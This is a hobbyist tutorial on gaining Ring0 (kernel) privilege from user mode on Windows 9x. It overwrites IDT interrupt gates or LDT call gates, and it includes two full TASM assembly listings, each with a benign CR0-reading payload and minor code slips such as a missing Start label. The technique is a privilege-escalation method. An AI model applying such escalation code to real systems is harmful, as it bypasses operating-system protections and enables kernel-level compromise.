This article gives a short overview over two ways to go Ring0 in Windows 9x in an undocumented way, exploiting the fact that none of the important system tables in Win9x are on pages which are protected from low-privilege access.

A basic knowledge of Protected Mode and OS Internals are required, refer to your Assembly Book for that :-) The techniques presented here are in no way a good/clean way to get to a higher privilege level, but since they require only a minimal coding effort, they are sometimes more desirable to implement than a full-fledged VxD.

1. Introduction

Under all modern Operating Systems, the CPU runs in protected mode, taking advantage of the special features of this mode to implementvirtual memory, multitasking etc. To manage access to system-critical resources (and to thus provide stability) a OS is in need of privilege levels, so that a program can't just switch out of protected mode etc. These privilege levels are represented on the x86 (I refer to x86 meaning 386 and following) CPU by 'Rings', with Ring0 being the most privileged and Ring3 being the least privileged level. Theoretically, the x86 is capable of 4 privilege levels, but Win32 uses only two of them, Ring0 as 'Kernel Mode' and Ring3 as 'User Mode'.

Since Ring0 is not needed by 99% of all applications, the only documented way to use Ring0 routines in Win9x is through VxDs. But VxDs, while being the only stable and recommended way, are work to write and big, so in a couple of specialized situations, other ways to go Ring0 are useful.

The CPU itself handles privilege level transitions in two ways: Through Exceptions/Interrupts and through Callgates. Callgates can be put in the LDT or GDT, Interrupt-Gates are found in the IDT.

We'll take advantage of the fact that these tables can be freely written to from Ring3 in Win9x (NOT IN NT !).

2. The IDT method

                                          D D
1.Offset (16-31)             P P P 0 1 1 1 0 0 0 0 R R R R R   +4
L L
--------------------------------- ---------------------------------
2.Segment Selector               3.Offset (0-15)                0
--------------------------------- ---------------------------------
DPL == Two bits containing the Descriptor Privilege Level
P   == Present bit
R   == Reserved bits

The first word (Nr.3) contains the lower word of the 32-bit address of the Exception Handler. The word at +6 contains the high-order word. The word at +2 is the selector of the segment in which the handler resides.

The word at +4 identifies the descriptor as Interrupt Gate, contains its privilege and the present bit. Now, to use the IDT to go Ring0, we'll create a new Interrupt Gate which points to our Ring0 procedure, save an old one and replace it with ours.

Then we'll trigger that exception. Instead of passing control to Window's own handler, the CPU will now execute our Ring0 code. As soon as we're done, we'll restore the old Interrupt Gate.

In Win9x, the selector 0028h always points to a Ring0-Code Segment, which spans the entire 4 GB address range. We'll use this as our Segment selector.

The DPL has to be 3, as we're calling from Ring3, and the present bit must be set. So the word at +4 will be 1110111000000000b => EE00h. These values can be hardcoded into our program, we have to just add the offset of our Ring0 Procedure to the descriptor. As exception, you should preferrably use one that rarely occurs, so do not use int 14h ;-)

I'll use int 9h, since it is (to my knowledge) not used on 486+.

Example code follows (to be compiled with TASM 5):

-------------------------------- bite here -----------------------------------

.386P
LOCALS
JUMPS
.MODEL FLAT, STDCALL

EXTRN ExitProcess : PROC

.data

IDTR        df 0            ; This will receive the contents of the IDTR
; register
SavedGate   dq 0            ; We save the gate we replace in here
OurGate     dw 0            ; Offset low-order word
dw 028h         ; Segment selector
dw 0EE00h       ;
dw 0            ; Offset high-order word

.code

      sidt     fword ptr IDTR
mov      ebx, dword ptr [IDTR+2]    ; load IDT Base Address
add      ebx, 8*9                   ; Address of int9 descriptor in ebx
mov      edi, offset SavedGate
mov      esi, ebx
movsd                               ; Save the old descriptor
movsd                               ; into SavedGate
mov      edi, ebx
mov      esi, offset OurGate
movsd                               ; Replace the old handler
movsd                               ; with our new one
int      9h                         ; Trigger the exception, thus
; passing control to our Ring0
; procedure
mov      edi, ebx
mov      esi, offset SavedGate
movsd                               ; Restore the old handler
movsd
call     ExitProcess, LARGE -1

Ring0Proc PROC

      mov      eax, CR0
iretd

Ring0Proc ENDP

end Start

-------------------------------- bite here -----------------------------------

3. The LDT Method

A Callgate is similar to a Interrupt Gate and is used in order to transfer control from a low-privileged segment to a high-privileged segment using a CALL instruction.

The format of a callgate is:

                                          D D                   D D D D
1.Offset (16-31)             P P P 0 1 1 0 0 0 0 0 0 W W W W   +4
L L                   C C C C
--------------------------------- ---------------------------------
2.Segment Selector               3.Offset (0-15)                0
--------------------------------- ---------------------------------
P   == Present bit
DPL == Descriptor Privilege Level
DWC == Dword Count, number of arguments copied to the ring0 stack

So all we have to do is to create such a callgate, write it into one of the first 16 descriptors, then do a far call to that descriptor to execute our Ring0 code.

Example Code:

-------------------------------- bite here -----------------------------------

.386P
LOCALS
JUMPS
.MODEL FLAT, STDCALL

EXTRN ExitProcess : PROC

.data

GDTR        df 0            ; This will receive the contents of the IDTR
; register
CallPtr     dd 00h          ; As we're using the first descriptor (8) and
dw 0Fh          ; its located in the LDT and the privilege level
; is 3, our selector will be 000Fh.
; That is because the low-order two bits of the
; selector are the privilege level, and the 3rd
; bit is set if the selector is in the LDT.
OurGate     dw 0            ; Offset low-order word
dw 028h         ; Segment selector
dw 0EC00h       ;
dw 0            ; Offset high-order word

.code

xor eax, eax

      sgdt     fword ptr GDTR
mov      ebx, dword ptr [GDTR+2]    ; load GDT Base Address
sldt     ax
add      ebx, eax                   ; Address of the LDT descriptor in
; ebx
mov      al, [ebx+4]                ; Load the base address
mov      ah, [ebx+7]                ; of the LDT itself into
shl      eax, 16                    ; eax, refer to your pmode
mov      ax, [ebx+2]                ; manual for details
add      eax, 8                     ; Skip NULL Descriptor
mov      edi, eax
mov      esi, offset OurGate
movsd                               ; Move our custom callgate
movsd                               ; into the LDT
call     fword ptr [CallPtr]        ; Execute the Ring0 Procedure
xor      eax, eax                   ; Clean up the LDT
sub      edi, 8
stosd
stosd
call     ExitProcess, LARGE -1

Ring0Proc PROC

      mov      eax, CR0
retf

Ring0Proc ENDP

end Start

-------------------------------- bite here -----------------------------------

Well, that's all for now folks. This method can be easily changedto use the GDT instead which would save a few bytes in case you have to optimize heavily.

Anyways, do use these methods with care, they will NOT run on NT and are generally not exactly a clean or stable way to do these things.

Credits & Thanks